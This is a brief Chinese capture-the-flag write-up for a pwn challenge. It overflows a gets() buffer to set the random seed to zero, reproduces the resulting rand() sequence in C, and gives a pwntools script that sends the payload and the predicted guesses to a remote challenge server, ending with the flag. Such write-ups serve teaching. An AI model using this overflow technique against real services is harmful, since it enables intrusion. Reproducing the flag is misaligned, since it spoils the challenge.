下载文件;使用ida64打开;
看这里,一开始还以为是我输入一个数,可以看到它会回显的数字;
好像不太行;
#include <stdio.h>
#include <stdlib.h>
int main()
{
int a,b;
srand(0);
for (size_t i=0;i<10;i++)
{
b = rand()%6+1;
printf("%d\n",b);
}
system("pause");
return 0;
}
输出结果为: ['2','5','4','2','6','2','5','1','4','2']
进入gets漏洞点看;
0x30-0x10 ; 需要0x20个字符来让它溢出;
from pwn import *
p = remote("61.147.171.105",50106)
payload = b'a' * (0x30 - 0x10) + p64(0)
p.sendlineafter("Your name:", payload)#上传达到溢出;
rand = ['2','5','4','2','6','2','5','1','4','2']
for i in range(10):
p.sendlineafter("Please input your guess number:",rand[i].encode())#这里看别的大佬的博客,然后进行了尝试一下,加与不加都可以;
p.interactive()
flag为:cyberpeace{08b9d2e122fdcc5cfd4c7955eb732ae1}